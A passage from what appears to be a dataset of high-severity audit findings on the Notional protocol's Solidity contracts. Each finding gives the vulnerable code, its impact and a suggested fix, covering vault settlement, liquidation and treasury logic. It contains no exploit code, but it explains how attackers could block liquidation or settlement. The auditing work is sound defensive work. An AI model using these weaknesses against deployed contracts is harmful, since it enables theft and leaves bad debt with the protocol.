? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\nчAny vault logic that relies on the VaultAccountSecondaryDebtShareStorage's maturity value would break since it has been cleared (set to zero). For instance, a vault account cannot be settled anymore as the following `settleSecondaryBorrow` function will always revert. Since `storedMaturity == 0` but `accountDebtTwo` is not zero, Line 399 below will always revert.\\nAs a result, a vault account with secondary currency debt cannot be settled. This also means that the vault account cannot exit since a vault account needs to be settled before exiting, causing users' assets to be stuck within the protocol.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function settleSecondaryBorrow(VaultConfig memory vaultConfig, address account) internal returns (bool) {\\n if (!vaultConfig.hasSecondaryBorrows()) return false;\\n\\n VaultAccountSecondaryDebtShareStorage storage accountStorage = \\n LibStorage.getVaultAccountSecondaryDebtShare()[account][vaultConfig.vault];\\n uint256 storedMaturity = accountStorage.maturity;\\n\\n // NOTE: we can read account debt directly since prime cash maturities never enter this block of code.\\n int256 accountDebtOne = -int256(uint256(accountStorage.accountDebtOne));\\n int256 accountDebtTwo = -int256(uint256(accountStorage.accountDebtTwo));\\n \\n if (storedMaturity == 0) {\\n // Handles edge condition where an account is holding vault shares past maturity without\\n // any debt position.\\n require(accountDebtOne == 0 && accountDebtTwo == 0); \\n } else {\\n```\\n\\nIn addition, the vault account data is corrupted as there is a secondary debt without maturity, which might affect internal accounting and tracking.ч```\\nFile: VaultSecondaryBorrow.sol\\n function _setAccountMaturity(\\n VaultAccountSecondaryDebtShareStorage storage accountStorage,\\n int256 accountDebtOne,\\n int256 accountDebtTwo,\\n uint40 maturity\\n ) private {\\n if (accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If both debt shares are cleared to zero, clear the maturity as well.\\n accountStorage.maturity = 0;\\n } else {\\n // In all other cases, set the account to the designated maturity\\n accountStorage.maturity = maturity;\\n }\\n }\\n```\\n -StrategyVault can perform a full exit without repaying all secondary debtчhighчStrategyVault can perform a full exit without repaying all secondary debt, leaving bad debt with the protocol.\\nNoted from the codebase's comment that:\\nVaults can borrow up to the capacity using the `borrowSecondaryCurrencyToVault` and `repaySecondaryCurrencyToVault` methods. Vaults that use a secondary currency must ALWAYS repay the secondary debt during redemption and handle accounting for the secondary currency themselves.\\nThus, when the StrategyVault-side performs a full exit for a vault account, Notional-side does not check that all secondary debts of that vault account are cleared (= zero) and will simply trust StrategyVault-side has already handled them properly.\\nLine 271 below shows that only validates the primary debt but not the secondary debt during a full exit.\\n```\\nFile: VaultAccountAction.sol\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n }\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n\\n // It's possible that the user redeems more vault shares than they lend (it is not always the case\\n // that they will be increasing their collateral ratio here, so we check that this is the case). No\\n // need to check if the account has exited in full (maturity == 0).\\n if (vaultAccount.maturity != 0) {\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n```\\nчConsider checking that all secondary debts of a vault account are cleared before executing a full exit.\\n```\\n// Add the line below\\n int256 accountDebtOne;\\n// Add the line below\\n int256 accountDebtTwo;\\n\\n// Add the line below\\n if (vaultConfig.hasSecondaryBorrows()) {\\n// Add the line below\\n (/* */, accountDebtOne, accountDebtTwo) = VaultSecondaryBorrow.getAccountSecondaryDebt(vaultConfig, account, pr);\\n// Add the line below\\n }\\n\\n// Remove the line below\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n// Add the line below\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0 && accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n}\\nvaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n```\\nчLeveraged vaults are designed to be as isolated as possible to mitigate the risk to the Notional protocol and its users. However, the above implementation seems to break this principle. As such, if there is a vulnerability in the leverage vault that allows someone to exploit this issue and bypass the repayment of the secondary debt, the protocol will be left with a bad debt which affects the insolvency of the protocol.ч```\\nFile: VaultAccountAction.sol\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n }\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n\\n // It's possible that the user redeems more vault shares than they lend (it is not always the case\\n // that they will be increasing their collateral ratio here, so we check that this is the case). No\\n // need to check if the account has exited in full (maturity == 0).\\n if (vaultAccount.maturity != 0) {\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n```\\n -Unable to transfer fee reserve assets to treasuryчhighчTransferring fee reserve assets to the treasury manager contract will result in a revert, leading to a loss of rewards for NOTE stakers.\\n```\\nFile: TreasuryAction.sol\\n /// @notice redeems and transfers tokens to the treasury manager contract\\n function _redeemAndTransfer(uint16 currencyId, int256 primeCashRedeemAmount) private returns (uint256) {\\n PrimeRate memory primeRate = PrimeRateLib.buildPrimeRateStateful(currencyId);\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n );\\n\\n require(actualTransferExternal > 0);\\n return uint256(actualTransferExternal);\\n }\\n```\\n\\nThe value returned by the `TokenHandler.withdrawPrimeCash` function is always less than or equal to zero. Thus, the condition `actualTransferExternal > 0` will always be false, and the `_redeemAndTransfer` function will always revert.\\nThe `transferReserveToTreasury` function depends on `_redeemAndTransfer` function. Thus, it is not possible to transfer any asset to the treasury manager contract.чNegate the value returned by the `TokenHandler.withdrawPrimeCash` function.\\n```\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n// Remove the line below\\n );\\n// Add the line below\\n ).neg();\\n```\\nчThe fee collected by Notional is stored in the Fee Reserve. The fee reserve assets will be transferred to Notional's Treasury to be invested into the sNOTE pool. Without the ability to do so, the NOTE stakers will not receive their rewards.ч```\\nFile: TreasuryAction.sol\\n /// @notice redeems and transfers tokens to the treasury manager contract\\n function _redeemAndTransfer(uint16 currencyId, int256 primeCashRedeemAmount) private returns (uint256) {\\n PrimeRate memory primeRate = PrimeRateLib.buildPrimeRateStateful(currencyId);\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n );\\n\\n require(actualTransferExternal > 0);\\n return uint256(actualTransferExternal);\\n }\\n```\\n -Excess funds withdrawn from the money marketчhighчExcessive amounts of assets are being withdrawn from the money market.\\n```\\nFile: TokenHandler.sol\\n function _redeemMoneyMarketIfRequired(\\n uint16 currencyId,\\n Token memory underlying,\\n uint256 withdrawAmountExternal\\n ) private {\\n // If there is sufficient balance of the underlying to withdraw from the contract\\n // immediately, just return.\\n mapping(address => uint256) storage store = LibStorage.getStoredTokenBalances();\\n uint256 currentBalance = store[underlying.tokenAddress];\\n if (withdrawAmountExternal <= currentBalance) return;\\n\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n // Redemption data returns an array of contract calls to make from the Notional proxy (which\\n // is holding all of the money market tokens).\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n\\n // This is the total expected underlying that we should redeem after all redemption calls\\n // are executed.\\n uint256 totalUnderlyingRedeemed = executeMoneyMarketRedemptions(underlying, data);\\n\\n // Ensure that we have sufficient funds before we exit\\n require(withdrawAmountExternal <= currentBalance.add(totalUnderlyingRedeemed)); // dev: insufficient redeem\\n }\\n```\\n\\nIf the `currentBalance` is `999,900` USDC and the `withdrawAmountExternal` is `1,000,000` USDC, then there is insufficient balance in the contract, and additional funds need to be withdrawn from the money market (e.g. Compound).\\nSince the contract already has `999,900` USDC, only an additional `100` USDC needs to be withdrawn from the money market to fulfill the withdrawal request of `1,000,000` USDC\\nHowever, instead of withdrawing `100` USDC from the money market, Notional withdraw `1,000,000` USDC from the market as per the `oracle.getRedemptionCalldata(withdrawAmountExternal)` function. As a result, an excess of `990,000` USDC is being withdrawn from the money marketчConsider withdrawing only the shortfall amount from the money market.\\n```\\n// Remove the line below\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n// Add the line below\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal // Remove the line below\\n currentBalance);\\n```\\nчThis led to an excessive amount of assets idling in Notional and not generating any returns or interest in the money market, which led to a loss of assets for the users as they would receive a lower interest rate than expected and incur opportunity loss.\\nAttackers could potentially abuse this to pull the funds Notional invested in the money market leading to griefing and loss of returns/interest for the protocol.ч```\\nFile: TokenHandler.sol\\n function _redeemMoneyMarketIfRequired(\\n uint16 currencyId,\\n Token memory underlying,\\n uint256 withdrawAmountExternal\\n ) private {\\n // If there is sufficient balance of the underlying to withdraw from the contract\\n // immediately, just return.\\n mapping(address => uint256) storage store = LibStorage.getStoredTokenBalances();\\n uint256 currentBalance = store[underlying.tokenAddress];\\n if (withdrawAmountExternal <= currentBalance) return;\\n\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n // Redemption data returns an array of contract calls to make from the Notional proxy (which\\n // is holding all of the money market tokens).\\n (RedeemData[] memory data) = oracle.getRedemptionCalldata(withdrawAmountExternal);\\n\\n // This is the total expected underlying that we should redeem after all redemption calls\\n // are executed.\\n uint256 totalUnderlyingRedeemed = executeMoneyMarketRedemptions(underlying, data);\\n\\n // Ensure that we have sufficient funds before we exit\\n require(withdrawAmountExternal <= currentBalance.add(totalUnderlyingRedeemed)); // dev: insufficient redeem\\n }\\n```\\n -Possible to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstandingчhighчIt is possible to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstanding. Thus, leaving accounts with small debt that are not profitable to unwind if it needs to liquidate.\\n```\\nFile: VaultValuation.sol\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n \"Must Liquidate All Debt\"\\n );\\n```\\n\\n`depositUnderlyingInternal` is always a positive value (Refer to comment on Line 250) that represents the amount of underlying deposited by the liquidator\\n`h.debtOutstanding[currencyIndex]` is always a negative value representing debt outstanding of a specific currency in a vault account\\n`minBorrowSize` is always a positive value that represents the minimal borrow size of a specific currency (It is stored as uint32 in storage)\\nIf liquidating past the debt outstanding above the min borrow, then the entire debt outstanding must be liquidated.\\nAssume the following scenario:\\n`depositUnderlyingInternal` = `70 USDC`\\n`h.debtOutstanding[currencyIndex]` = `-100 USDC`\\n`minBorrowSize` = `50 USDC`\\nIf the liquidation is successful, the vault account should be left with `-30 USDC` debt outstanding because `70 USDC` has been paid off by the liquidator. However, this should not happen under normal circumstances because the debt outstanding (-30) does not meet the minimal borrow size of `50 USDC` and the liquidation should revert/fail.\\nThe following piece of validation logic attempts to ensure that all outstanding debt is liquidated if post-liquidation debt does not meet the minimal borrowing size.\\n```\\nrequire(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n \"Must Liquidate All Debt\"\\n);\\n```\\n\\nPlugging in the values from our scenario to verify if the code will revert if the debt outstanding does not meet the minimal borrow size.\\n```\\nrequire(\\n (-100 USDC - 70 USDC) < 50 USDC\\n);\\n===>\\nrequire(\\n (-170 USDC) < 50 USDC\\n);\\n===>\\nrequire(true) // no revert\\n```\\n\\nThe above shows that it is possible for someone to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstanding. This shows that the math formula in the code is incorrect and not working as intended.чUpdate the formula to as follows:\\n```\\nrequire(\\n// Remove the line below\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n// Add the line below\\n h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) > minBorrowSize,\\n \"Must Liquidate All Debt\"\\n);\\n```\\n\\nPlugging in the values from our scenario again to verify if the code will revert if the debt outstanding does not meet the minimal borrow size.\\n```\\nrequire(\\n ((-100 USDC).neg() - 70 USDC) > 50 USDC\\n);\\n===>\\nrequire(\\n (100 USDC - 70 USDC) > 50 USDC\\n);\\n===>\\nrequire(\\n (30 USDC) > 50 USDC\\n);\\n===>\\nrequire(false) // revert\\n```\\n\\nThe above will trigger a revert as expected when the debt outstanding does not meet the minimal borrow size.чA liquidation can bring an account below the minimum debt. Accounts smaller than the minimum debt are not profitable to unwind if it needs to liquidate (Reference)\\nAs a result, liquidators are not incentivized to liquidate those undercollateralized positions. This might leave the protocol with bad debts, potentially leading to insolvency if the bad debts accumulate.ч```\\nFile: VaultValuation.sol\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n \"Must Liquidate All Debt\"\\n );\\n```\\n -Vaults can avoid liquidations by not letting their vault account be settledчhighчVault liquidations will leave un-matured accounts with cash holdings which are then used to offset account debt during vault account settlements. As it stands, any excess cash received via interest accrual will be transferred back to the vault account directly. If a primary or secondary borrow currency is `ETH`, then this excess cash will be transferred natively. Consequently, the recipient may intentionally revert, causing account settlement to fail.\\nThe issue arises in the `VaultAccount.repayAccountPrimeDebtAtSettlement()` function. If there is any excess cash due to interest accrual, then this amount will be refunded to the vault account. Native `ETH` is not wrapped when it should be wrapped, allowing the recipient to take control over the flow of execution.\\n```\\nFile: VaultAccount.sol\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n\\n // Updates the global prime debt figure and events are emitted via the vault.\\n pr.updateTotalPrimeDebt(vault, currencyId, netPrimeDebtChange);\\n\\n // Updates the state on the prime vault storage directly.\\n int256 totalPrimeDebt = int256(uint256(primeVaultState.totalDebt));\\n int256 newTotalDebt = totalPrimeDebt.add(netPrimeDebtChange);\\n // Set the total debt to the storage value\\n primeVaultState.totalDebt = newTotalDebt.toUint().toUint80();\\n }\\n }\\n```\\n\\nAs seen here, a `withdrawWrappedNativeToken` is used to signify when a native `ETH` transfer will be wrapped before sending an amount. In the case of vault settlement, this is always sent to `false`.\\n```\\nFile: TokenHandler.sol\\n function withdrawPrimeCash(\\n address account,\\n uint16 currencyId,\\n int256 primeCashToWithdraw,\\n PrimeRate memory primeRate,\\n bool withdrawWrappedNativeToken\\n ) internal returns (int256 netTransferExternal) {\\n if (primeCashToWithdraw == 0) return 0;\\n require(primeCashToWithdraw < 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n netTransferExternal = convertToExternal(\\n underlying, \\n primeRate.convertToUnderlying(primeCashToWithdraw) \\n );\\n\\n // Overflow not possible due to int256\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n _redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n\\n if (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n } else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n }\\n\\n _postTransferPrimeCashUpdate(account, currencyId, netTransferExternal, underlying, primeRate);\\n }\\n```\\n\\nIt's likely that the vault account is considered solvent in this case, but due to the inability to trade between currencies, it is not possible to use excess cash in one currency to offset debt in another.чConsider wrapping `ETH` under all circumstances. This will prevent vault accounts from intentionally reverting and preventing their account from being settled.чLiquidations require vaults to be settled if `block.timestamp` is past the maturity date, hence, it is not possible to deleverage vault accounts, leading to bad debt accrual.ч```\\nFile: VaultAccount.sol\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n\\n // Updates the global prime debt figure and events are emitted via the vault.\\n pr.updateTotalPrimeDebt(vault, currencyId, netPrimeDebtChange);\\n\\n // Updates the state on the prime vault storage directly.\\n int256 totalPrimeDebt = int256(uint256(primeVaultState.totalDebt));\\n int256 newTotalDebt = totalPrimeDebt.add(netPrimeDebtChange);\\n // Set the total debt to the storage value\\n primeVaultState.totalDebt = newTotalDebt.toUint().toUint80();\\n }\\n }\\n```\\n -Possible to create vault positions ineligible for liquidationчhighчUsers can self-liquidate their secondary debt holdings in such a way that it is no longer possible to deleverage their vault account as `checkMinBorrow` will fail post-maturity.\\nWhen deleveraging a vault account, the liquidator will pay down account debt directly and the account will not accrue any cash. Under most circumstances, it is not possible to put an account's debt below its minimum borrow size.\\nHowever, there are two exceptions to this:\\nLiquidators purchasing cash from a vault account. This only applies to non-prime vault accounts.\\nA vault account is being settled and `checkMinBorrow` is skipped to ensure an account can always be settled.\\n```\\nFile: VaultLiquidationAction.sol\\n function deleverageAccount(\\n address account,\\n address vault,\\n address liquidator,\\n uint16 currencyIndex,\\n int256 depositUnderlyingInternal\\n ) external payable nonReentrant override returns (\\n uint256 vaultSharesToLiquidator,\\n int256 depositAmountPrimeCash\\n ) {\\n require(currencyIndex < 3);\\n (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) = _authenticateDeleverage(account, vault, liquidator);\\n\\n PrimeRate memory pr;\\n // Currency Index is validated in this method\\n (\\n depositUnderlyingInternal,\\n vaultSharesToLiquidator,\\n pr\\n ) = IVaultAccountHealth(address(this)).calculateDepositAmountInDeleverage(\\n currencyIndex, vaultAccount, vaultConfig, vaultState, depositUnderlyingInternal\\n );\\n\\n uint16 currencyId = vaultConfig.borrowCurrencyId;\\n if (currencyIndex == 1) currencyId = vaultConfig.secondaryBorrowCurrencies[0];\\n else if (currencyIndex == 2) currencyId = vaultConfig.secondaryBorrowCurrencies[1];\\n\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // Excess ETH is returned to the liquidator natively\\n (/* */, depositAmountPrimeCash) = TokenHandler.depositUnderlyingExternal(\\n liquidator, currencyId, token.convertToExternal(depositUnderlyingInternal), pr, false \\n );\\n\\n // Do not skip the min borrow check here\\n vaultAccount.vaultShares = vaultAccount.vaultShares.sub(vaultSharesToLiquidator);\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Vault account will not incur a cash balance if they are in the prime cash maturity, their debts\\n // will be paid down directly.\\n _reduceAccountDebt(\\n vaultConfig, vaultState, vaultAccount, pr, currencyIndex, depositUnderlyingInternal, true\\n );\\n depositAmountPrimeCash = 0;\\n }\\n\\n // Check min borrow in this liquidation method, the deleverage calculation should adhere to the min borrow\\n vaultAccount.setVaultAccountForLiquidation(vaultConfig, currencyIndex, depositAmountPrimeCash, true);\\n\\n emit VaultDeleverageAccount(vault, account, currencyId, vaultSharesToLiquidator, depositAmountPrimeCash);\\n emit VaultLiquidatorProfit(vault, account, liquidator, vaultSharesToLiquidator, true);\\n\\n _transferVaultSharesToLiquidator(\\n liquidator, vaultConfig, vaultSharesToLiquidator, vaultAccount.maturity\\n );\\n\\n Emitter.emitVaultDeleverage(\\n liquidator, account, vault, currencyId, vaultState.maturity,\\n depositAmountPrimeCash, vaultSharesToLiquidator\\n );\\n }\\n```\\n\\n`currencyIndex` represents which currency is being liquidated and `depositUnderlyingInternal` the amount of debt being reduced. Only one currency's debt can be updated here.\\n```\\nFile: VaultLiquidationAction.sol\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n pr[currencyIndex - 1] = primeRate;\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 ? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\n\\nIn the case of vault settlement, through self-liquidation, users can setup their debt and cash holdings post-settlement, such that both `accountDebtOne` and `accountDebtTwo` are non-zero and less than `vaultConfig.minAccountSecondaryBorrow`. The objective would be to have zero primary debt and `Y` secondary debt and `X` secondary cash. Post-settlement, cash is used to offset debt (Y - `X` < minAccountSecondaryBorrow) and due to the lack of `checkMinBorrow` in `VaultAccountAction.settleVaultAccount()`, both secondary currencies can have debt holdings below the minimum amount.\\nNow when `deleverageAccount()` is called on a prime vault account, debts are paid down directly. However, if we are only able to pay down one secondary currency at a time, `checkMinBorrow` will fail in `VaultSecondaryBorrow.updateAccountSecondaryDebt()` because both debts are checked.\\n```\\nFile: VaultSecondaryBorrow.sol\\n if (checkMinBorrow) {\\n // No overflow on negation due to overflow checks above\\n require(accountDebtOne == 0 || vaultConfig.minAccountSecondaryBorrow[0] <= -accountDebtOne, \"min borrow\");\\n require(accountDebtTwo == 0 || vaultConfig.minAccountSecondaryBorrow[1] <= -accountDebtTwo, \"min borrow\");\\n }\\n```\\n\\nNo prime fees accrue on secondary debt, hence, this debt will never reach a point where it is above the minimum borrow amount.чEither allow for multiple currencies to be liquidated or ensure that `checkMinBorrow` is performed only on the currency which is being liquidated.чMalicious actors can generate vault accounts which cannot be liquidated. Through opening numerous vault positions, Notional can rack up significant exposure and accrue bad debt as a result.ч```\\nFile: VaultLiquidationAction.sol\\n function deleverageAccount(\\n address account,\\n address vault,\\n address liquidator,\\n uint16 currencyIndex,\\n int256 depositUnderlyingInternal\\n ) external payable nonReentrant override returns (\\n uint256 vaultSharesToLiquidator,\\n int256 depositAmountPrimeCash\\n ) {\\n require(currencyIndex < 3);\\n (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) = _authenticateDeleverage(account, vault, liquidator);\\n\\n PrimeRate memory pr;\\n // Currency Index is validated in this method\\n (\\n depositUnderlyingInternal,\\n vaultSharesToLiquidator,\\n pr\\n ) = IVaultAccountHealth(address(this)).calculateDepositAmountInDeleverage(\\n currencyIndex, vaultAccount, vaultConfig, vaultState, depositUnderlyingInternal\\n );\\n\\n uint16 currencyId = vaultConfig.borrowCurrencyId;\\n if (currencyIndex == 1) currencyId = vaultConfig.secondaryBorrowCurrencies[0];\\n else if (currencyIndex == 2) currencyId = vaultConfig.secondaryBorrowCurrencies[1];\\n\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // Excess ETH is returned to the liquidator natively\\n (/* */, depositAmountPrimeCash) = TokenHandler.depositUnderlyingExternal(\\n liquidator, currencyId, token.convertToExternal(depositUnderlyingInternal), pr, false \\n );\\n\\n // Do not skip the min borrow check here\\n vaultAccount.vaultShares = vaultAccount.vaultShares.sub(vaultSharesToLiquidator);\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Vault account will not incur a cash balance if they are in the prime cash maturity, their debts\\n // will be paid down directly.\\n _reduceAccountDebt(\\n vaultConfig, vaultState, vaultAccount, pr, currencyIndex, depositUnderlyingInternal, true\\n );\\n depositAmountPrimeCash = 0;\\n }\\n\\n // Check min borrow in this liquidation method, the deleverage calculation should adhere to the min borrow\\n vaultAccount.setVaultAccountForLiquidation(vaultConfig, currencyIndex, depositAmountPrimeCash, true);\\n\\n emit VaultDeleverageAccount(vault, account, currencyId, vaultSharesToLiquidator, depositAmountPrimeCash);\\n emit VaultLiquidatorProfit(vault, account, liquidator, vaultSharesToLiquidator, true);\\n\\n _transferVaultSharesToLiquidator(\\n liquidator, vaultConfig, vaultSharesToLiquidator, vaultAccount.maturity\\n );\\n\\n Emitter.emitVaultDeleverage(\\n liquidator, account, vault, currencyId, vaultState.maturity,\\n depositAmountPrimeCash, vaultSharesToLiquidator\\n );\\n }\\n```\\n -Partial liquidations are not possibleчhighчDue to an incorrect implementation of `VaultValuation.getLiquidationFactors()`, Notional requires that a liquidator reduces an account's debt below `minBorrowSize`. This does not allow liquidators to partially liquidate a vault account into a healthy position and opens up the protocol to an edge case where an account is always ineligible for liquidation.\\nWhile `VaultValuation.getLiquidationFactors()` might allow for the resultant outstanding debt to be below the minimum borrow amount and non-zero, `deleverageAccount()` will revert due to `checkMinBorrow` being set to `true`. Therefore, the only option is for liquidators to wipe the outstanding debt entirely but users can set up their vault accounts such that that `maxLiquidatorDepositLocal` is less than each of the vault currency's outstanding debt.\\n```\\nFile: VaultValuation.sol\\n int256 maxLiquidatorDepositLocal = _calculateDeleverageAmount(\\n vaultConfig,\\n h.vaultShareValueUnderlying,\\n h.totalDebtOutstandingInPrimary.neg(),\\n h.debtOutstanding[currencyIndex].neg(),\\n minBorrowSize,\\n exchangeRate,\\n er.rateDecimals\\n );\\n\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n 